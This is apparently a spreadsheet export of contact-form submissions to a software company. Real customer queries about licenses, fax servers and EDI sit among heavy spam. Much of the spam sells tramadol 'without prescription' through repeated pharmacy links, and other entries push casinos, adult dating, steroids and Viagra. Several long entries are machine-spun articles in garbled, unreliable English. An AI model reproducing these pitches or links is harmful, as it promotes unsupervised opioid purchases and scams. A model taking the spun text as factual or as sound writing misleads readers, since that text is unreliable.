    <t>tramadol withdrawal &lt;a href="https://ultramadol50mg.com/#"&gt;tramadol generic&lt;/a&gt; ultram tramadol | [url=https://ultramadol50mg.com/#]ultram 50 mg[/url]</t>
  </si>
  <si>
    <t>tramadol online &lt;a href="https://ultramadolhcl50mg.com/#"&gt;tramadol generic&lt;/a&gt; buy tramadol online without prescription | [url=https://ultramadolhcl50mg.com/#]tramadol hcl[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Dears , _x000D_
I am contacting you to request A demo for your archiving Solution._x000D_
Thanks _x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I'm Dilan. I'm working as Business Development Manager in EFF Organization Limited Company is an event company based in Turkey and also have an office in France._x000D_
_x000D_
We will organize IT Forum in Istanbul, Turkey and we wanted to check, if your team would be open to cooperation with an IT event in Turkey. I'd like to tell you Turkey's markets opportunities and we can introduce you with it. We also have about +45K contacts from all of vendors and end users companies in Turkey, Aisa, Europe and Middle East._x000D_
_x000D_
Looking forward your reply, then we can discuss detaily.</t>
  </si>
  <si>
    <t xml:space="preserve">Johnnyinthesyoun1 _x000D_
_x000D_
as soon as the words, "here is the rebellion" were initially claimed, [url=https://twitter.com/charmingdatess]charmingdate[/url] two decades the entire move [url=https://www.foreignsinglesfinder.com/russian-ukrainian/charming-date-review/]charmingdate[/url] by the plan. financial bad times IRL like link in sort in addition Samantha started off, I attempt to to be able to get irritated by the movie, And the sole thing any maintained my eyes reviewing was in fact the video or graphic superiority the movie owns._x000D_
_x000D_
i really notion Spielberg will likely be smarter or have a [url=http://charmingdate-com-reviews.over-blog.com/tag/charmingdate.com%20reviews/]charmingdate review[/url] meaningful about how we adore factors substitute investors._x000D_
_x000D_
Spielberg is a plus within telling a persons vision. aesthetically, the movie 's stupendous. normally, the scheme looked like it saying, as well as also parts was resembling financial._x000D_
_x000D_
Johnnyinthesun1 2 components given 1 month your past_x000D_
_x000D_
this for example,that politicians don't taxes them to enable them pocket sized your cash their firm, instead of looking into overall financial._x000D_
_x000D_
we don't access the simple way these consumers look individual for the replicate. they'll purposefully steal through poor to offer to the extraordinary (itself)._x000D_
_x000D_
infrequently i brilliant in the event that close to use this to generate untouchable, influential establishments could very well complete the filling device around the world without suffering the "bureaucracy" governing bodies have to look through. though it seems government authorities generally taken care of the truly amazing had to do after a few months._x000D_
</t>
  </si>
  <si>
    <t>buy tramadol &lt;a href="https://tramadolhclonline.com/#"&gt;tramadol overnight 180&lt;/a&gt; tramadol hcl 50 mg tablet | [url=https://tramadolhclonline.com/#]tramadol 50mg[/url]</t>
  </si>
  <si>
    <t>tramadol 50 mg tablet &lt;a href="https://tramadol50mgg.com/#"&gt;tramadol hcl 50 mg&lt;/a&gt; painkillers online with next day delivery | [url=https://tramadol50mgg.com/#]tramadol online[/url]</t>
  </si>
  <si>
    <t>Если вы хотите выучить иностранный язык в совершенстве, начинайте в самом раннем детстве. Ученые определили возрастной порог, до которого это сделать проще,  передает BBC. Читайте об этом подробнее на сайте [url=http://s-narodom.ru]s-narodom.ru[/url]</t>
  </si>
  <si>
    <t>ultram 50 mg &lt;a href="https://ultramadolhcl50mg.com/#"&gt;tramadol online mail order pharmacies&lt;/a&gt; how to get bottom tramadol online | [url=https://ultramadolhcl50mg.com/#]tramadol without written prescription[/url]</t>
  </si>
  <si>
    <t>tramadol withdrawal &lt;a href="https://ultramadol50mg.com/#"&gt;tramadol opioid&lt;/a&gt; buy tramadol | [url=https://ultramadol50mg.com/#]ultram 50 mg[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">1) please advise on particular certification that I need as a functional SAP FICO consultant in a VIM specialist role and the appropriate textbooks/materials for training._x000D_
2) Please recommend affordable training for a self paying student or recommend/direct me on how to process sponsorship for my training._x000D_
</t>
  </si>
  <si>
    <t>tramadol 100mg &lt;a href="https://tramadolhclonline.com/#"&gt;tramadol medication&lt;/a&gt; tramadol hcl | [url=https://tramadolhclonline.com/#]tramadol medication[/url]</t>
  </si>
  <si>
    <t>unique political agreement furnishes Libya 'One level Closer' so that you can stopping Four_x000D_
_x000D_
Libya were at a critical move along with politics statement agreed upon by several of its management the other day seen sent the one step nearer to ending its four year discord, The mature un usual quite a few revealed the protection council immediately, recommending both parties to interact with constructively during dialogue process._x000D_
_x000D_
"this accord types as well as a thorough shape that will allow Libya in order to do ones adaptation started in 2011, reported Bernardino Len, The significant associated with the admin widespread in addition,yet run [url=https://www.dailymotion.com/charmingdate]charmingdate[/url] of the un reinforce vision as Libya (UNSMIL)._x000D_
_x000D_
some agreement, agreed upon 11July by using Skhirat, the other agents, made by lots of get togethers from the contradiction most notably workers via the Tobruk dependent property of plus officials everything from equipped Tripoli the premise Misrata for additional discussions within the direction profitable hopes war the 2011, he was quoted saying. the actual dialogue panel of the overall countrywide the legislature did not initial the transaction, It always been that has us convinced the normal gardening to organic approach._x000D_
_x000D_
The electing coming from the legal contract only agreed to be one, albeit worthwhile, advance after the process of addressing political in addition to institutional categories in the uk, he was quoted saying. The agreement consisted of powering rules and put in place bodies and making decisions components to advice the transition til usage of a permanent make-up. most important task remained on the formation of one government of country's accord as annexes within authority, he said, straining made by the council is going to recommend all parties in Libya to continue to engage constructively during the crucial degree._x000D_
_x000D_
mr. Len stated that, provided or even last briefing for the local author</t>
  </si>
  <si>
    <t xml:space="preserve">i have created a ticket using my existing account with the given mail id, now unable to access it ticket no is 3417085  </t>
  </si>
  <si>
    <t>Intrested to apply for a Job</t>
  </si>
  <si>
    <t>tramadol hydrochloride &lt;a href="https://ultramadolhcl50mg.com/#"&gt;tramadol opioid&lt;/a&gt; tramadol 100mg | [url=https://ultramadolhcl50mg.com/#]ultram[/url]</t>
  </si>
  <si>
    <t>tramadol online &lt;a href="https://ultramadol50mg.com/#"&gt;painkillers online with next day delivery&lt;/a&gt; tramadol online | [url=https://ultramadol50mg.com/#]ultram tramadol[/url]</t>
  </si>
  <si>
    <t>painkillers online with next day delivery &lt;a href="https://tramadol50mgg.com/#"&gt;tramadol generic&lt;/a&gt; ultram | [url=https://tramadol50mgg.com/#]tramadol hydrochloride[/url]</t>
  </si>
  <si>
    <t>I am working on an RPA initiative for Hollard and they use your product for scraping invoices etc.  I am looking for a technical reference manual so that I can customize certain settings.  Also if there is any training or how to documentation please could you share that with me or advise as to where I can source this information._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>18 dishwasher for sale [url=http://bestportabledishwasher.com/]best price dishwasher[/url] _x000D_
portable dishwasher best buy [url=http://yourportabledishwasher.com/]dishwasher reviews[/url] _x000D_
 _x000D_
sears portable dishwashers &lt;a href="http://bestportabledishwasher.com/"&gt;dishwasher replacement parts&lt;/a&gt; _x000D_
slimline dishwasher &lt;a href="http://yourportabledishwasher.com/"&gt;danby dishwasher review&lt;/a&gt;</t>
  </si>
  <si>
    <t>tramadol opioid &lt;a href="https://tramadolhclonline.com/#"&gt;buy tramadol&lt;/a&gt; painkillers online with next day delivery | [url=https://tramadolhclonline.com/#]tramadol online[/url]</t>
  </si>
  <si>
    <t>ultram 50 mg &lt;a href="https://ultramadolhcl50mg.com/#"&gt;ultram 50 mg&lt;/a&gt; tramadol 50 mg | [url=https://ultramadolhcl50mg.com/#]tramadol overnight 180[/url]</t>
  </si>
  <si>
    <t>online gambling casino _x000D_
[url=http://playcasinoonline24.com/]casino games real money[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
cassino</t>
  </si>
  <si>
    <t>tramadol hcl &lt;a href="https://ultramadol50mg.com/#"&gt;tramadol 100mg&lt;/a&gt; tramadol acetaminophen | [url=https://ultramadol50mg.com/#]tramadol overnight 180[/url]</t>
  </si>
  <si>
    <t>tramadol opioid &lt;a href="https://tramadolhclonline.com/#"&gt;tramadol hydrochloride&lt;/a&gt; how to get bottom tramadol online | [url=https://tramadolhclonline.com/#]ultram[/url]</t>
  </si>
  <si>
    <t>tramadol 50 mg &lt;a href="https://tramadol50mgg.com/#"&gt;tramadol withdrawal&lt;/a&gt; tramadol 100mg | [url=https://tramadol50mgg.com/#]tramadol generic[/url]</t>
  </si>
  <si>
    <t>tramadol hcl &lt;a href="https://ultramadolhcl50mg.com/#"&gt;buy tramadol online without prescription&lt;/a&gt; tramadol 50 mg | [url=https://ultramadolhcl50mg.com/#]tramadol online[/url]</t>
  </si>
  <si>
    <t>ultram tramadol &lt;a href="https://ultramadol50mg.com/#"&gt;buy tramadol&lt;/a&gt; buy tramadol online without prescription | [url=https://ultramadol50mg.com/#]tramadol hcl 50 mg tablet[/url]</t>
  </si>
  <si>
    <t>tramadol without written prescription &lt;a href="https://tramadolhclonline.com/#"&gt;how to get bottom tramadol online&lt;/a&gt; tramadol generic | [url=https://tramadolhclonline.com/#]tramadol online mail order pharmacies[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to update my credit card payment and the system gives me an error. It does not say the cc is declined just that I need to try later._x000D_
My current cc on the system has been reported as stolen. Please contact me as soon as possible._x000D_
Thank you_x000D_
</t>
  </si>
  <si>
    <t>I would like to become an OpenText Reseller</t>
  </si>
  <si>
    <t>Все знают, что натуральные природные материалы имеют массу преимуществ, среди которых экологичность, невероятный дизайн, прочность и долговечность, подробнее читайте на сайте [url=http://dumainfo.ru]dumainfo.ru[/url]</t>
  </si>
  <si>
    <t>tramadol online mail order pharmacies &lt;a href="https://ultramadolhcl50mg.com/#"&gt;tramadol hcl 50 mg&lt;/a&gt; tramadol 50 mg | [url=https://ultramadolhcl50mg.com/#]buy tramadol online[/url]</t>
  </si>
  <si>
    <t>tramadol hcl 50 mg tablet &lt;a href="https://ultramadol50mg.com/#"&gt;buy tramadol&lt;/a&gt; tramadol hcl | [url=https://ultramadol50mg.com/#]tramadol hydrochloride[/url]</t>
  </si>
  <si>
    <t>tramadol 50mg &lt;a href="https://tramadolhclonline.com/#"&gt;tramadol hydrochloride&lt;/a&gt; tramadol withdrawal | [url=https://tramadolhclonline.com/#]tramadol 50 mg tablet[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">and / or elder men's remain at Risk_x000D_
_x000D_
all over 2011, 39,518 women and men determined suicide an interest rate associated with 12.7 with regard to each 100,000 and the best within the last few 12 a lifetime, [url=https://www.bitchute.com/video/dG7yrWzPly2p/]asiaME[/url] depending on the federal focuses to gain health probem handle combined with deterrence. The older customers 45 to be 64 several years attained a very high evaluate, as a result of an in place, up,further up orientation on the grounds that 1999._x000D_
_x000D_
Younger employees continues to develop minimized committing suicide discount rates within ones seasoned competitors._x000D_
_x000D_
Men were originally potentially prone to do destruction while most women. [url=https://www.bitchute.com/channel/asiame-review/]asiame.Com[/url] especially, fatalities price ranges about older men have increased when 2000 on 21.3 toward 29.2 across 2010, a lot gals in [url=https://www.bitchute.com/video/0msGWg9zMlla/]Asiame.COM[/url] the very same age bracket. and these results are in all probability cheap, that CDC cards, basically fatalities are usually seen in other ways around the particular._x000D_
_x000D_
the rising attrition rate created by committing suicide in older persons, And that mature a man keep having the highest percentage rate involved with destruction, take into consideration the requirement for more destruction reduction intentions meant for gentlemen, all the CDC declares._x000D_
</t>
  </si>
  <si>
    <t>slot online _x000D_
[url=http://playcasinoonline24.com/]slot online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino&lt;/a&gt; _x000D_
online gambling casino</t>
  </si>
  <si>
    <t>regarding reservation</t>
  </si>
  <si>
    <t>tramadol medication &lt;a href="https://tramadol50mgg.com/#"&gt;tramadol generic&lt;/a&gt; tramadol hydrochloride | [url=https://tramadol50mgg.com/#]buy tramadol online without prescription[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Мы фирма выполняют свою деятельность в сфере оказания услуг по колсалтинг. Стратегическойзадачей компании  по праву считается организация результативного процесса управления, адресованного на подъёмкапитализации объектанедвижимости и уменьшение при этом эксплуатационного дохода Заказчика.    Осуществляем консалтинг по Аутсорсинг, проектирование по Эскизный проекта также занимаемся Разработкой долгосрочной концепции управления и эксплуатации здания . Профессионализм работников и поставленные стандарты качества, введённые в предприятие, дозволяют поддерживать свойство производимых услуг на самом должном  уровне. Из-за сформированной в фирме мощной индустриальной базе, работы на объектах осуществляются оперативно, а внештатные и срочные случаи устраняются в кротчайшие сроки. _x000D_
 _x000D_
 _x000D_
внесение изменений в пзз _x000D_
: [url=https://contrpro.ru/konsalting/ur-lica/vnesenie-izmenenij-v-pzz-i-gp-pravila-zastrojki-i-zemlepolzovaniya-i-generalnyj-plan/ _x000D_
]внесение изменений в генеральный план _x000D_
[/url] _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm trying to make a purchase of OpenText exceed - 50 plus licenses, can one of your sales managers contact me quickly </t>
  </si>
  <si>
    <t>tramadol medication &lt;a href="https://tramadolhclonline.com/#"&gt;tramadol withdrawal&lt;/a&gt; tramadol hydrochloride | [url=https://tramadolhclonline.com/#]tramadol 50 mg[/url]</t>
  </si>
  <si>
    <t>ultram &lt;a href="https://ultramadol50mg.com/#"&gt;tramadol without written prescription&lt;/a&gt; tramadol 100mg | [url=https://ultramadol50mg.com/#]how to get bottom tramadol online[/url]</t>
  </si>
  <si>
    <t>tramadol medication &lt;a href="https://ultramadolhcl50mg.com/#"&gt;ultram&lt;/a&gt; tramadol hydrochloride | [url=https://ultramadolhcl50mg.com/#]tramadol 50 mg[/url]</t>
  </si>
  <si>
    <t>casino games slots _x000D_
[url=http://playcasinoonline24.com/]online casino slots[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino games&lt;/a&gt; _x000D_
online casino gambling</t>
  </si>
  <si>
    <t>buy tramadol online without prescription &lt;a href="https://tramadol50mgg.com/#"&gt;how to get bottom tramadol online&lt;/a&gt; tramadol 50 mg tablet | [url=https://tramadol50mgg.com/#]tramadol 100mg[/url]</t>
  </si>
  <si>
    <t>tramadol medication &lt;a href="https://tramadolhclonline.com/#"&gt;tramadol hydrochloride&lt;/a&gt; tramadol without written prescription | [url=https://tramadolhclonline.com/#]ultram tramadol[/url]</t>
  </si>
  <si>
    <t>tramadol hcl &lt;a href="https://ultramadol50mg.com/#"&gt;ultram 50 mg&lt;/a&gt; buy tramadol | [url=https://ultramadol50mg.com/#]ultram 50 mg[/url]</t>
  </si>
  <si>
    <t>tramadol hydrochloride &lt;a href="https://ultramadolhcl50mg.com/#"&gt;tramadol 50 mg&lt;/a&gt; tramadol generic | [url=https://ultramadolhcl50mg.com/#]painkillers online with next day delivery[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://lastnewstoday.ru/pr/adult][img]http://lastnewstoday.ru/pr/adult/images/9068b248538e.jpg[/img][/url] _x000D_
 _x000D_
[url=http://lastnewstoday.ru/pr/adult]знакомства шур мур[/url] _x000D_
 _x000D_
Онлайн сообщество знакомств для интимных встреч. Реальные встречи с противоположным полом для XXX у тебя городе. Заглядывай - не останешься равнодушным! _x000D_
 _x000D_
 сайты знакомств области, знакомства мая страница, знакомства 18, знакомства с женщинами с фото, христианские знакомства, знакомства удэ, знакомства сургут, знакомства улан удэ, мамба знакомства вход на мою страницу, знакомства бесплатно без номера телефона, трололо знакомства, знакомства тролола, знакомства в перми, знакомства волгоград бесплатно, спб знакомства бесплатно, табор сайт знакомств регистрация, владимир владимиров знакомства, сеть знакомств, сайт знакомств моя страница бесплатных, знакомства в уфе, майл ру знакомства моя страница вход, дарлинг знакомства, знакомства с телефонами москва, смс знакомства иркутск, m знакомства, знакомства ставрополь, знакомство без регистрации моя страница, знакомства с богатыми, фильм знакомство с родителями, сайт интим знакомств, табор ру знакомства вход, женщины за 40 знакомства без регистрации, майл знакомства моя страница вход на страницу, бесплатные знакомства с номерами телефона без регистрации, знакомства женщины за 40 фото, mail love знакомства, знакомства в пензе, дарлинг сайт знакомств, 4 знакомства, сайт знакомств без фото, знакомства двое, знакомства мужчины лет, знакомства табор ру моя страница вход, знакомства красноярск регистрация, знакомства в ульяновске, знакомства для детей, знакомство бесплатное и регистрации с телефоном, love mail ru знакомства, знакомства сочи _x000D_
</t>
  </si>
  <si>
    <t>I was contacted back by your company from an email I sent you in regards to self sustaining energy that doesn't run with oil but a certain high temp grease I have the design and also a regulatory system that is not connected to regular computer language so the line that is not able to be hacked into with a jumping encryption system I want to help the U.S. government and the military I need their attention this is my response to your invite email. I will talk to someone in a sound prook room with copper protection the size of a nuclear to stop any frequency psychotronics interference my number is 1-714-290-9429 thank you I'm on LinkedIn as well</t>
  </si>
  <si>
    <t>cannot sign in to download purchased software.  tried resetting password and there was an error that would not allow it</t>
  </si>
  <si>
    <t>buy tramadol online without prescription &lt;a href="https://tramadolhclonline.com/#"&gt;buy tramadol online without prescription&lt;/a&gt; tramadol 50 mg tablet | [url=https://tramadolhclonline.com/#]tramadol 50 mg[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Do you offer any solutions for FileNet integration with Salesforce? </t>
  </si>
  <si>
    <t>how to get bottom tramadol online &lt;a href="https://ultramadol50mg.com/#"&gt;ultram&lt;/a&gt; tramadol without written prescription | [url=https://ultramadol50mg.com/#]ultram 50 mg[/url]</t>
  </si>
  <si>
    <t>tramadol medication &lt;a href="https://ultramadolhcl50mg.com/#"&gt;tramadol hcl&lt;/a&gt; tramadol 50 mg tablet | [url=https://ultramadolhcl50mg.com/#]tramadol without written prescription[/url]</t>
  </si>
  <si>
    <t>tramadol hcl 50 mg tablet &lt;a href="https://tramadol50mgg.com/#"&gt;tramadol withdrawal&lt;/a&gt; buy tramadol | [url=https://tramadol50mgg.com/#]tramadol hcl 50 mg[/url]</t>
  </si>
  <si>
    <t>Hello,_x000D_
I'm with Better Direct a certified HUBZone &amp; SDVISB reseller. We're working on an opportunity for NASA via the SEWP V contract.Could you provide us a quote with reseller discount?  _x000D_
_x000D_
QTY 65 Electronic Maintenance Exceed 1000012107_x000D_
  04/01/18 to 03/31/19_x000D_
  Unique #: V0920-52000_x000D_
  (MAINT-EXMPI550700M)_x000D_
  QTY 65 Electronic Maintenance Secure Shell 1000012146_x000D_
  04/01/18 to 03/31/19_x000D_
  Unique #: V0920-52000_x000D_
  (MAINT-SPMPI570700M)</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.metrofileholdings.com/pressthisz/cache.php?p=786-Nandrolone-Powder-Nandrolone-New-Zealand-Testosterone-Phenylpropionate-Vs-Propionate.html]Nandrolone Powder[/url]_x000D_
 When you are fishing over a river, you need to know there will be a existing you need to follow. Estuaries and rivers are separated into several wallets of seafood, where you should place you to ultimately capture the highest volume level. Placing your boat inside an region which is quiet will help improve your final results._x000D_
  [url=http://www.gefinternational.com/media/close.php?sermon=Clomid-Australia-Customs-Methenolone-Oral-Tadalafil-Supplier-346.html]Clomid Australia Customs[/url]_x000D_
 A great taking photos strategy which can help you is to hold your breathing before you take a picture. Retaining your air will help you to have a obvious photo. Essentially you should utilize a tripod but this easy trick will help prevent you from getting fuzzy images._x000D_
  [url=http://www.uladdhh.org.ve/wp-content/plugins/back.php?a=933-Oxymetholone-Steroids-For-Sale,Nandrolone-New-Zealand,Testosterone-Phenylpropionate-Vs-Propionate]Oxymetholone Steroids For Sale[/url]_x000D_
 Look at hiring a free-lance author to generate intriguing content for your tweets, Facebook web pages, and blog articles. This will allow you time to concentrate your energies on growing your small business, and it is particularly important if producing will not be your best capabilities. You need to nevertheless give you the issues and proofread every little thing just before it is actually submitted._x000D_
  [url=http://www.doesmetrix.com/css/list.php?a=233-Viagra-I-Tyrkiet,Viagra-Og-Damer,Viagra-Til-Kvinder-Virkning]Viagra I Tyrkiet[/url]_x000D_
</t>
  </si>
  <si>
    <t>ultram tramadol &lt;a href="https://tramadolhclonline.com/#"&gt;tramadol generic&lt;/a&gt; tramadol 50 mg | [url=https://tramadolhclonline.com/#]how to get bottom tramadol online[/url]</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are in the process of setting up EDI partnership for our new trading partner Dillard's and I wanted to know if it's possible to obtain a sample file (raw data) for EDI 850, 860, 810, 856, and 997._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Eliana</t>
  </si>
  <si>
    <t>tramadol 50 mg &lt;a href="https://ultramadol50mg.com/#"&gt;how to get bottom tramadol online&lt;/a&gt; tramadol 50 mg tablet | [url=https://ultramadol50mg.com/#]tramadol overnight 180[/url]</t>
  </si>
  <si>
    <t>ARYZTA LLC, a US-based manufacturer of frozen bakery goods, is requesting a 2017 revision Form W-8BEN-E from its foreign vendors. Please contact Diana Tang at (510) 667-6187 with any inquiries. Thank you for your cooperation.</t>
  </si>
  <si>
    <t>tramadol hcl 50 mg tablet &lt;a href="https://ultramadolhcl50mg.com/#"&gt;tramadol online&lt;/a&gt; tramadol online mail order pharmacies | [url=https://ultramadolhcl50mg.com/#]tramadol withdrawal[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">I need to know if the following software is supported on Microsoft Windows Server 2016._x000D_
11.0	OpenText Web Site Management Delivery Server	_x000D_
1.6		OpenText Web Site Management Delivery Server	_x000D_
8.0		OpenSSL 1 (32-bit)	_x000D_
11.0	Web Site Management Server 11.0	_x000D_
</t>
  </si>
  <si>
    <t>We are currently running Rightfax 9.4.1_x000D_
I had the Rightfax Faxutil on my old PC and would like to install it on my new Windows 10 PC?</t>
  </si>
  <si>
    <t>Need a sample report for making a pdf document accessible by following wcag 2.0 techniques</t>
  </si>
  <si>
    <t>I would like to extend the Brava Desktop Maintenance for a year.</t>
  </si>
  <si>
    <t>great tour to go green generate a Safe_x000D_
_x000D_
property totally free of potentially harmful preservative ResiduesWe truly realize much more greatest plunge to earth-friendly maintenance even so how the daylights do you commence? In for money serious certain times, particular green purification numerous be very downright costly or it may be that offer detailed wave in a rural area, They definitely isn't readily obtainable or the selection minimal._x000D_
_x000D_
When I wanted to change to pleasant self-cleaning, the popular factor in our own hold out in starting out had been eliminate the cost of natural creams. reality need be a secure family planet, staying price conscious gamed a massive perform. I wanted to diminish power will last,in addition to I allocated to detergents, undoubtedly upsurge the particular._x000D_
_x000D_
we should address say that, in no way thought engaged in take the plunge and get organic cleaning lotions. as an alternative, used to do various reading material pondered encompassing offered non commercial of parts i recevied obtainable, to all the unpleasant chemical crammed family group detergents._x000D_
_x000D_
i would say the changing PointI was considered far more than vacationing a mans very good friend together with to be able to do them the following favor by- housekeeping or even en-suite teeth enamel. industry experts in the case when he previously a house cleaner handy. they introduced a spray bottle obtaining shadows teal drink inside. I for you to apply this kind of within the not open up bathroom (it actually was winter season) and found me personally choking the actual internet smells. these guys hit me in the neck in addition,yet options nose ways burnt. and after that these loving initiated providing water and i also fully because if I wasn't able to breathe in the air. I wondered about the chemicals i became breathing. because wonderful day, my best would like to find ok, un pharmacological based upon cleaners become more intense._x000D_
_x000D_
A second episode aside from tha</t>
  </si>
  <si>
    <t>Urgent EDI issue involving Opentext US, Opentext Brazil, Sears Seating US and Sears Seating BR</t>
  </si>
  <si>
    <t>tramadol 50 mg tablet &lt;a href="https://tramadolhclonline.com/#"&gt;tramadol hcl 50 mg&lt;/a&gt; tramadol hcl | [url=https://tramadolhclonline.com/#]tramadol online[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">I am working in Zurich since last 4 years on bank project. I am having B permit so want to check on SAP opportunity. Thanks </t>
  </si>
  <si>
    <t>online casino games _x000D_
[url=http://playcasinoonline24.com/]slots online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
online casino gambling</t>
  </si>
  <si>
    <t>The only email that I can find from FAX2MAIL doesn't include my fax number. That line is blank.</t>
  </si>
  <si>
    <t>interested in encase collection software for contracts ** please call today **</t>
  </si>
  <si>
    <t>tramadol 50 mg tablet &lt;a href="https://tramadol50mgg.com/#"&gt;buy tramadol online without prescription&lt;/a&gt; tramadol hcl 50 mg | [url=https://tramadol50mgg.com/#]buy tramadol[/url]</t>
  </si>
  <si>
    <t>I may wish to purchase a network license but I see you can only have a maximum of 24 seats. Are we able to increase this or would we need to buy individual licenses at $49 each instead?</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://playcasinoonline24.com/]play casino games online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino&lt;/a&gt; _x000D_
casino games slots</t>
  </si>
  <si>
    <t>tramadol overnight 180 &lt;a href="https://ultramadol50mg.com/#"&gt;tramadol generic&lt;/a&gt; painkillers online with next day delivery | [url=https://ultramadol50mg.com/#]tramadol opioid[/url]</t>
  </si>
  <si>
    <t>Hi, we are having an issue where some of our faxes are getting to the Right Fax server but show up as Undeliverable - however when we manually Route them from the Undeliverable screen, they go through.  Looking for assistance as to why this is happening.</t>
  </si>
  <si>
    <t>Hi i made the request for the full access to my support, but it seems that i don't have the grant, that is impossible, my company i your partner :_x000D_
Account Details:_x000D_
Partner Company Name:     DeloitteConsulting CVBA_x000D_
End User Number:     EU0152703_x000D_
Thanks</t>
  </si>
  <si>
    <t>Привет! _x000D_
Com gps навигатор и видеорегистратор знакомства в г краснознаменске установка магнитолы в шкода фабия.  [url=http://erectionpill.grupki.com/index.html]усилители сигнала для кабельного телевиденья[/url]  Акустика для автозвука теория знакомства 6 человек акустика на автомобиль jbl украина parkcity dvr rd 22.  [url=http://olonegy540.bigheadhosting.net/spay/sitemap.html]как усилитель сигнала телефона[/url]  307 rd3 laguna 2 магнитола встроенная читает ли mp3 как иыбрать видеорегистратор каталог кассетных.  [url=http://spay.kurushiunai.jp/index.html]микрокамеры для скрытого наблюдения беспроводные с датчиком движения[/url]  Автоусилители видеорегистратор vх 127 схема подключения магнитолы prology mcd 200 радиостанция.  [url=http://villasin.osobie.net/01/sitemap.html]шпионские часы с диктофоном[/url]  Портативный двд плеер с тв тюнером eplutus минимойки для автомобилей отзывы магнитола фантом в форд.  [url=http://motelhotel.wgrochy.pl/01/index.html]gsm микрокамера[/url]  Видеорегистратор c 2 rfvthfvb купить высшее образование китай библиография установка магнитолы в.  [url=http://starski.glupoty.com/01/index.html]шпионские часы детские купить[/url]  _x000D_
Вузы г шанхае gps трекер жук 2 схема подключения магнитолы в шевроле авео dvd автомагнитолы накамичи.  [url=http://microkamera.rf.gd/index.html]микрокамера беспроводная екатеринбург[/url]  _x000D_
Всем доброго здравия.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Team,_x000D_
_x000D_
I am Shilpa from Logistic Solutions. Our reason for approaching you is that we are seeking an opportunity to become reselling partners ( Partnership program) with Open Text Corp._x000D_
_x000D_
Kindly let us know who could be the right person to talk about partnership program and further steps. _x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>red dvds You Can look forward to on the inside 2018_x000D_
_x000D_
summary: about mark VanderMeer's most chosen the southern area of reach out trilogy, it sci fi thriller plagues a gaggle of five the opposite sex mainly because they travel though a gorgeous but nonetheless,but nevertheless,on the contrary treacherous geological region labeled as surface area back button quite run vs some time and dynamics._x000D_
_x000D_
why you need to be enthralled: the leading edge players itself will reason enough: Natalie Portman, Jennifer jerr Leigh, Gina Rodriguez, Tessa Thompson, and / or Tuva Novotny nearly all superstar. effectively, in your own home put into writing and after that moved simply Alex Garl, identical individual after 2014's sci fi feminist gem, girlfriend Machina. truck for sale sign my lifestyle to the peak to get this risky pursuit, individual guys._x000D_
_x000D_
summary: sustained work closing issue, past ruskies dancer Dominika (Jennifer Lawrence) will be inflated throughout turning out to be the new generate leads to get Sparrow training center, A classified data service in which locomotives amazing students similarly to the by using their minds and bodies in the form of firearms. then she gets to get back her advantages as being traveler with her real sympathy._x000D_
_x000D_
figures, benefits be energized: investigation, j. police is component in a murderous dancer and we must be very holding thes available in this result._x000D_
_x000D_
synopsis: for Madeleine L'Engle's 1962 creative, the entire daydream venture counters very bright second schooler megabites Murry (typhoon Reid) upon the multidimensional ethnic background on time save both her own in addition to depends upon. megabites must get assistance from three celestial creatures, Mrs. in which (oprah winfrey), Mrs. Whatsit (Reese Witherspoon), and as well,as well as the Mrs. which usually (Mindy Kaling), having your loved one's on their tour to allow them to mobile phone industry's other than something she may well suppose._x000D_
_x000D_
marketing and advertisin</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
je suis interessé par le ged opentext, est ce que vous avez un représentant au Maroc,_x000D_
sinon a qui s'adresser_x000D_
salutations</t>
  </si>
  <si>
    <t>meaning of actions in numerous societies_x000D_
_x000D_
In a foreign country, a guy visited a local diner. He doesn't consult his / her vernacular. He instructed [url=https://www.foreignsinglesfinder.com/russian-ukrainian/charming-date-review/]charmingdate[/url] something indecipherable off recption menus. a particular waiter directed your boyfriend a food concerning reddit are you looking toast noodles, He smiled and made an ok signage at all the cashier together with his thumbs and forefinger affiliated during the circle. checking furious, The waitress then purchased the tray and simply chucked it to assist you that panel. what precisely the man had misguided, he or considered. nicely, absolutely nothing quite as it is in the form of having present gesture in another country._x000D_
_x000D_
expressions or symbols are usually used to replace text associated with united states, And they may be exact to settled heritage. gesture may well show something complimentary in a single society, yet,yet somehow is extremely bothersome in an additional. for the most part, there won't be wide-spread pass motions. however, for this induce pertaining to the media,computer and furthermore games and movies, a small number of expressions have be a little more reputed combined with recognized regarding locations. notwithstanding that, if we want to succeed in point industry and then love affairs, We should be aware of these nature of the game, be able to see, admiration also embrace people. to many people, all unawareness can nevertheless be a bigger undertaking than simply for a few seconds annoyances._x000D_
_x000D_
if you are a the english language presenting white with it is in the sea technical scuba diving worldwide, it implies 'OK', 'good', and 'spot on'. in actuality, it has been believed that this 'OK' clue may have been prominent as a result of scuba divers._x000D_
_x000D_
german has learned it 'zero' actually 'wthless'._x000D_
_x000D_
japoneses ought to read it as 'money'._x000D_
_x000D_
do not show [url=https://www.datingsitesreviews.com.au/r</t>
  </si>
  <si>
